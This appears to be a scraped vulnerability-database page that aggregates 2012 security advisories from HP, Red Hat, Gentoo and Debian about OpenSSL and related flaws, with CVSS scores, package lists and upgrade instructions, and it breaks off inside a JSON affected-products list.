Reference Base Vector Base Score CVE-2012-2012 (AV:N/AC:L/Au:N/C:C/I:C/A:P) 9.7 CVE-2012-2013 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2012-2014 (AV:N/AC:M/Au:S/C:N/I:N/A:N) 6.8 CVE-2012-2015 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 6.5 CVE-2012-2016 (AV:L/AC:M/Au:S/C:C/I:N/A:N) 4.4 CVE-2011-1944 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2011-2821 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2011-2834 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2011-3379 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2011-3607 (AV:L/AC:M/Au:N/C:P/I:P/A:P) 4.4 CVE-2011-4078 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2011-4108 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2011-4153 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2011-4317 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2011-4415 (AV:L/AC:H/Au:N/C:N/I:N/A:P) 1.2 CVE-2011-4576 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2011-4577 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2011-4619 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2011-4885 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2012-0021 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6 CVE-2012-0027 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2012-0031 (AV:L/AC:L/Au:N/C:P/I:P/A:P) 4.6 CVE-2012-0036 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-0053 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2012-0057 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2012-0830 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-1165 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2012-1823 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided HP System Management Homepage v7.1.1 or subsequent to resolve the vulnerabilities. HP System Management Homepage v7.1.1 is available here:
HP System Management Homepage for Windows x64
[Download here] or enter the following URL into the browser address window.
http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail s/?sp4ts.oid=4091409&spf_p.tpst=psiSwdMain&spf_p.prp_psiSwdMain=wsrp-navigati onalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa meId%253D4091409%257CswEnvOID%253D4064%257CswLang%253D8%257CswItem%253DMTX-ab 0d4e9bb4654a8da503eccfd9%257Cmode%253D3%257Caction%253DdriverDocument&javax.p ortlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vign ette.cachetoken
HP System Management Homepage for Windows x86
[Download here] or enter the following URL into the browser address window.
http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail s/?sp4ts.oid=4091409&spf_p.tpst=psiSwdMain&spf_p.prp_psiSwdMain=wsrp-navigati onalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa meId%253D4091409%257CswEnvOID%253D4022%257CswLang%253D8%257CswItem%253DMTX-f7 c0d15d28474255bd0ec23136%257Cmode%253D3%257Caction%253DdriverDocument&javax.p ortlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vign ette.cachetoken
HP System Management Homepage for Linux (AMD64/EM64T)
[Download here] or enter the following URL into the browser address window.
http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail s/?sp4ts.oid=4091409&spf_p.tpst=psiSwdMain&spf_p.prp_psiSwdMain=wsrp-navigati onalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa meId%253D4091409%257CswEnvOID%253D4035%257CswLang%253D8%257CswItem%253DMTX-18 d373dd1361400fbaca892942%257Cmode%253D3%257Caction%253DdriverDocument&javax.p ortlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vign ette.cachetoken
HP System Management Homepage for Linux (x86)
[Download here] or enter the following URL into the browser address window.
http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail s/?sp4ts.oid=4091409&spf_p.tpst=psiSwdMain&spf_p.prp_psiSwdMain=wsrp-navigati onalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa meId%253D4091409%257CswEnvOID%253D4006%257CswLang%253D8%257CswItem%253DMTX-9e 8a0188f97d48139dcb466509%257Cmode%253D3%257Caction%253DdriverDocument&javax.p ortlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vign ette.cachetoken
HISTORY Version:1 (rev.1) 26 June 2012 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c02964430
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. Relevant releases/architectures:
RHEV Hypervisor for RHEL-5 - noarch
- The Red Hat Enterprise Virtualization Hypervisor is a dedicated Kernel-based Virtual Machine (KVM) hypervisor.
A heap overflow flaw was found in the way QEMU-KVM emulated the e1000 network interface card. A privileged guest user in a virtual machine whose network interface is configured to use the e1000 emulated driver could use this flaw to crash the host or, possibly, escalate their privileges on the host. (CVE-2012-0029)
A divide-by-zero flaw was found in the Linux kernel's igmp_heard_query() function. An attacker able to send certain IGMP (Internet Group Management Protocol) packets to a target system could use this flaw to cause a denial of service. (CVE-2012-0207)
A double free flaw was discovered in the policy checking code in OpenSSL. (CVE-2011-4619)
Red Hat would like to thank Nicolae Mogoreanu for reporting CVE-2012-0029, and Simon McVittie for reporting CVE-2012-0207. The security fixes included in this update address the following CVE numbers:
CVE-2006-1168 and CVE-2011-2716 (busybox issues)
CVE-2009-5029, CVE-2009-5064, CVE-2010-0830 and CVE-2011-1089 (glibc issues)
CVE-2011-1083, CVE-2011-3638, CVE-2011-4086, CVE-2011-4127 and CVE-2012-0028 (kernel issues)
CVE-2011-1526 (krb5 issue)
CVE-2011-4347 (kvm issue)
CVE-2010-4008, CVE-2011-0216, CVE-2011-2834, CVE-2011-3905, CVE-2011-3919 and CVE-2011-1944 (libxml2 issues)
CVE-2011-1749 (nfs-utils issue)
CVE-2011-4108 (openssl issue)
CVE-2011-0010 (sudo issue)
CVE-2011-1675 and CVE-2011-1677 (util-linux issues)
CVE-2010-0424 (vixie-cron issue)
This updated rhev-hypervisor5 package fixes various bugs. Bugs fixed (http://bugzilla.redhat.com/):
606191 - after upgrade , reboot can't shut off network successfully and back to firstboot menu again 627538 - System will not boot sometimes when using rhevm to do upgrade twice. 650179 - rhevm bridge came up instead of breth0 after fail to configure network 675325 - Changes to networking always clear the contents of resolv.conf 696875 - RHEVH bootup hanging in ovirt-early when doing LVM scanning 717535 - [RFE] No confirm message for ntp server setting 728895 - RHEV-H rpm should include a versions text file 732948 - CCISS: Auto install fail at creating physical volume. 734110 - rhevh - upgrade ovirt node fails due to nonexistent breth0 734480 - [RFE] Add virt-who package to RHEVH 734710 - Register RHN satellite will fail if RHN satellite password include space. 740127 - Provide our CPE name in a new system file 743938 - Make rhev-hypervisor RPM multi-installable like the kernel 747519 - RHEV-H 5.8 register to RHN will fail. 747647 - Change rhev-hypervisor RPM to be rhev-hypervisor5 to allow coinstallations with rhev-hypervisor6 756178 - remove redundant brcm-iscsi.log rotation from ovirt-node now that it is in iscsi-initiator-utils 758465 - RHEV-H 5.8 register to RHN will fail if password contains quotes or spaces 759462 - Can not retrieve running guests UUID in RHEVH node. 759632 - virt-who debugging output going to stderr always 759635 - Revert workaround of virt-who output 761357 - Multipathd service is stopped by default cause change password failed in single mode. 768256 - network layout is incorrect when configure network with nic up 771771 - CVE-2011-4109 openssl: double-free in policy checks 771775 - CVE-2011-4576 openssl: uninitialized SSL 3.0 padding 771780 - CVE-2011-4619 openssl: SGC restart DoS attack 772075 - CVE-2012-0029 qemu-kvm: e1000: process_tx_desc legacy mode packets heap overflow 772867 - CVE-2012-0207 kernel: igmp: Avoid zero delay when receiving odd mixture of IGMP queries 783625 - The setup command should only allow password setting and viewing logs in single mode. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201203-12
http://security.gentoo.org/
Severity: Normal Title: OpenSSL: Multiple vulnerabilities Date: March 06, 2012 Bugs: #397695, #399365 ID: 201203-12
Synopsis
Multiple vulnerabilities have been found in OpenSSL, allowing remote attackers to cause a Denial of Service or obtain sensitive information.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/openssl < 1.0.0g *>= 0.9.8t >= 1.0.0g
Description
Multiple vulnerabilities have been found in OpenSSL:
- Timing differences for decryption are exposed by CBC mode encryption in OpenSSL's implementation of DTLS (CVE-2011-4108).
- A policy check failure can result in a double-free error when X509_V_FLAG_POLICY_CHECK is set (CVE-2011-4109).
- Assertion errors can occur during the handling of malformed X.509 certificates when OpenSSL is built with RFC 3779 support (CVE-2011-4577).
- Invalid parameters in the GOST block cipher are not properly handled by the GOST ENGINE(CVE-2012-0027).
- An incorrect fix for CVE-2011-4108 creates an unspecified vulnerability for DTLS applications using OpenSSL (CVE-2012-0050).
Workaround
There is no known workaround at this time.
Resolution
All OpenSSL users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.0g"
References
[ 1 ] CVE-2011-4108 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4108 [ 2 ] CVE-2011-4109 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4109 [ 3 ] CVE-2011-4576 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4576 [ 4 ] CVE-2011-4577 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4577 [ 5 ] CVE-2011-4619 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4619 [ 6 ] CVE-2012-0027 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0027 [ 7 ] CVE-2012-0050 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0050
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201203-12.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 .
Multiple numeric conversion errors, leading to a buffer overflow, were found in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data from BIO (OpenSSL's I/O abstraction) inputs. Specially-crafted DER (Distinguished Encoding Rules) encoded data read from a file or other BIO input could cause an application using the OpenSSL library to crash or, potentially, execute arbitrary code.
Warning: Before applying the update, back up your existing JBoss Enterprise Web Server installation (including all applications and configuration files).
All users of JBoss Enterprise Web Server 1.0.2 for Solaris and Microsoft Windows as provided from the Red Hat Customer Portal are advised to apply this update. Solution:
The References section of this erratum contains a download link (you must log in to download the update). Before applying the update, back up your existing JBoss Enterprise Web Server installation (including all applications and configuration files). -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: openssl security update Advisory ID: RHSA-2012:0059-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0059.html Issue date: 2012-01-24 CVE Names: CVE-2011-4108 CVE-2011-4576 CVE-2011-4577 CVE-2011-4619 =====================================================================
- Summary:
Updated openssl packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6.
The Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library.
It was discovered that the Datagram Transport Layer Security (DTLS) protocol implementation in OpenSSL leaked timing information when performing certain operations. A remote attacker could possibly use this flaw to retrieve plain text from the encrypted packets by using a DTLS server as a padding oracle. (CVE-2011-4108)
An information leak flaw was found in the SSL 3.0 protocol implementation in OpenSSL. Incorrect initialization of SSL record padding bytes could cause an SSL client or server to send a limited amount of possibly sensitive data to its SSL peer via the encrypted connection. (CVE-2011-4576)
A denial of service flaw was found in the RFC 3779 implementation in OpenSSL. A remote attacker could use this flaw to make an application using OpenSSL exit unexpectedly by providing a specially-crafted X.509 certificate that has malformed RFC 3779 extension data. (CVE-2011-4619)
All OpenSSL users should upgrade to these updated packages, which contain backported patches to resolve these issues. For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.
- Solution:
Before applying this update, make sure all previously-released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259
- Bugs fixed (http://bugzilla.redhat.com/):
771770 - CVE-2011-4108 openssl: DTLS plaintext recovery attack 771775 - CVE-2011-4576 openssl: uninitialized SSL 3.0 padding 771778 - CVE-2011-4577 openssl: malformed RFC 3779 data can cause assertion failures 771780 - CVE-2011-4619 openssl: SGC restart DoS attack
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm
i386: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm
x86_64: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-1.0.0-20.el6_2.1.x86_64.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm
i386: openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm openssl-perl-1.0.0-20.el6_2.1.i686.rpm openssl-static-1.0.0-20.el6_2.1.i686.rpm
x86_64: openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.x86_64.rpm openssl-perl-1.0.0-20.el6_2.1.x86_64.rpm openssl-static-1.0.0-20.el6_2.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm
x86_64: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-1.0.0-20.el6_2.1.x86_64.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm
x86_64: openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.x86_64.rpm openssl-perl-1.0.0-20.el6_2.1.x86_64.rpm openssl-static-1.0.0-20.el6_2.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm
i386: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm
ppc64: openssl-1.0.0-20.el6_2.1.ppc.rpm openssl-1.0.0-20.el6_2.1.ppc64.rpm openssl-debuginfo-1.0.0-20.el6_2.1.ppc.rpm openssl-debuginfo-1.0.0-20.el6_2.1.ppc64.rpm openssl-devel-1.0.0-20.el6_2.1.ppc.rpm openssl-devel-1.0.0-20.el6_2.1.ppc64.rpm
s390x: openssl-1.0.0-20.el6_2.1.s390.rpm openssl-1.0.0-20.el6_2.1.s390x.rpm openssl-debuginfo-1.0.0-20.el6_2.1.s390.rpm openssl-debuginfo-1.0.0-20.el6_2.1.s390x.rpm openssl-devel-1.0.0-20.el6_2.1.s390.rpm openssl-devel-1.0.0-20.el6_2.1.s390x.rpm
x86_64: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-1.0.0-20.el6_2.1.x86_64.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm
i386: openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-perl-1.0.0-20.el6_2.1.i686.rpm openssl-static-1.0.0-20.el6_2.1.i686.rpm
ppc64: openssl-debuginfo-1.0.0-20.el6_2.1.ppc64.rpm openssl-perl-1.0.0-20.el6_2.1.ppc64.rpm openssl-static-1.0.0-20.el6_2.1.ppc64.rpm
s390x: openssl-debuginfo-1.0.0-20.el6_2.1.s390x.rpm openssl-perl-1.0.0-20.el6_2.1.s390x.rpm openssl-static-1.0.0-20.el6_2.1.s390x.rpm
x86_64: openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm openssl-perl-1.0.0-20.el6_2.1.x86_64.rpm openssl-static-1.0.0-20.el6_2.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm
i386: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm
x86_64: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-1.0.0-20.el6_2.1.x86_64.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm
i386: openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-perl-1.0.0-20.el6_2.1.i686.rpm openssl-static-1.0.0-20.el6_2.1.i686.rpm
x86_64: openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm openssl-perl-1.0.0-20.el6_2.1.x86_64.rpm openssl-static-1.0.0-20.el6_2.1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2011-4108.html https://www.redhat.com/security/data/cve/CVE-2011-4576.html https://www.redhat.com/security/data/cve/CVE-2011-4577.html https://www.redhat.com/security/data/cve/CVE-2011-4619.html https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2012 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFPHySOXlSAg2UNWIIRAlYpAKCQCY5k4gZ5VKOHZekEaWFHDNjGZwCZAdR3 CJl5iUxU4cxJLOsSBESSRVs= =PMiS -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . The Common Vulnerabilities and Exposures project identifies the following vulnerabilities:
CVE-2011-4108 The DTLS implementation performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack.
CVE-2011-4109 A double free vulnerability when X509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to cause applications crashes and potentially allow execution of arbitrary code by triggering failure of a policy check.
CVE-2011-4354 On 32-bit systems, the operations on NIST elliptic curves P-256 and P-384 are not correctly implemented, potentially leaking the private ECC key of a TLS server.
For the oldstable distribution (lenny), these problems have been fixed in version 0.9.8g-15+lenny15.
For the stable distribution (squeeze), these problems have been fixed in version 0.9.8o-4squeeze5.
For the testing distribution (wheezy) and the unstable distribution (sid), these problems have been fixed in version 1.0.0f-1. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . The verification of md5 checksums and GPG signatures is performed automatically for you
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201201-0314", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.4" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7f" }, { "model": "openssl", "scope": "lte", "trust": 1.0, "vendor": "openssl", "version": "0.9.8r" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8q" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.2b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8p" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8c" }, { "model": "openssl", "scope": "lte", "trust": 1.0, "vendor": "openssl", "version": "1.0.0e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.5" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.5a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6d" }, { "model": "openssl", "scope": 